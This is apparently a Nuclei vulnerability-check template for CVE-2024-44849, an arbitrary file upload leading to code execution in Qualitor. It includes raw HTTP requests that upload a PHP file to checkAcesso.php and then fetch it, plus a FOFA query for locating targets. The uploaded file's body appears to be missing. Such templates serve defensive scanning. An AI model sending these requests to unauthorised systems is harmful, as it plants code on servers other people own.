id: CVE-2024-44849 info: name: Qualitor <= 8.24 - Remote Code Execution author: s4e-io severity: critical description: | Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php. reference: - https://cvefeed.io/vuln/detail/CVE-2024-44849 - https://nvd.nist.gov/vuln/detail/CVE-2024-44849 - https://github.com/extencil/CVE-2024-44849 - https://blog.extencil.me/information-security/cves/cve-2024-44849 - https://sploitus.com/exploit?id=D08D686E-7910-5E17-99CC-36407B9884B8 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-44849 cwe-id: CWE-434 metadata: verified: true max-request: 2 vendor: qualitor product: qualitor fofa-query: "Qualitor" tags: cve,cve2024,rce,file-upload,qualitor,intrusive variables: filename: "{{rand_base(12)}}" num: "{{rand_int(1000, 9999)}}" flow: http(1) && http(2) http: - raw: - | POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849 -----------------------------QUALITORspaceCVEspace2024space44849 Content-Disposition: form-data; name="idtipo" 2 -----------------------------QUALITORspaceCVEspace2024space44849 Content-Disposition: form-data; name="nmfilestorage" -----------------------------QUALITORspaceCVEspace2024space44849 Content-Disposition: form-data; name="nmdiretoriorede" . -----------------------------QUALITORspaceCVEspace2024space44849 Content-Disposition: form-data; name="nmbucket" -----------------------------QUALITORspaceCVEspace2024space44849 Content-Disposition: form-data; name="nmaccesskey" -----------------------------QUALITORspaceCVEspace2024space44849 Content-Disposition: form-data; name="nmkeyid" -----------------------------QUALITORspaceCVEspace2024space44849 Content-Disposition: form-data; name="fleArquivo"; filename="{{filename}}.php" -----------------------------QUALITORspaceCVEspace2024space44849 Content-Disposition: form-data; name="cdfilestorage" -----------------------------QUALITORspaceCVEspace2024space44849-- matchers: - type: dsl dsl: - contains_all(body, "parent.showQAlert(\'Upload", "showQAlert") - status_code == 200 condition: and internal: true - raw: - | GET /html/ad/adfilestorage/request/{{filename}}.php HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body,"{{md5(num)}}")' - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and # digest: 4b0a00483046022100a9a274d0dc0fcf9d9cadbf11e17722d8273bef9062b706e031eb27319fcfb53b022100d9d40968b2d24451453a92bf17c0d40250a23caf9a94ac7fe7e68039ea79306a:922c64590222798bb761d5b6d8e72950